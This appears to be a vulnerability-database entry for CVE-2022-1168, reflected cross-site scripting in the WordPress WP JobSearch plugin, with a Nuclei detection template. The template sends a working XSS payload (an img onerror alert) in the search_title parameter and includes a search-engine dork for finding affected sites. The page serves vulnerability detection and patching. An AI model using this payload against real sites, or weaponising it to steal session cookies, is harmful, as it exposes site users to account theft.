CVE-2022-1168: WordPress WP JobSearch <1.5.1 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress WP JobSearch | POC: 已公开

漏洞描述

WordPress WP JobSearch plugin prior to 1.5.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2022-1168

info:
  name: WordPress WP JobSearch <1.5.1 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress WP JobSearch plugin prior to 1.5.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  remediation: |
    Update to the latest version of the WP JobSearch plugin (1.5.1 or higher) to mitigate the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
    - https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1168
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1168
    cwe-id: CWE-79
    epss-score: 0.03356
    epss-percentile: 0.86867
    cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: eyecix
    product: jobsearch_wp_job_board
    framework: wordpress
    google-query: inurl:"wp-content/plugins/wp-jobsearch"
  tags: cve,cve2022,wp-jobsearch",wpscan,wp-plugin,wp,wordpress,xss,eyecix

http:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=x onerror=alert(domain)>"
          - "wp-jobsearch"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 404
# digest: 4b0a00483046022100cdb711a24ec1233848ade54b131b90166902b01c1b235f203a9efc14a8884048022100dc058c997b14912fd9de0490ba402ceef54d8ca000f8f2a0be2f0b5247f4da81:922c64590222798bb761d5b6d8e72950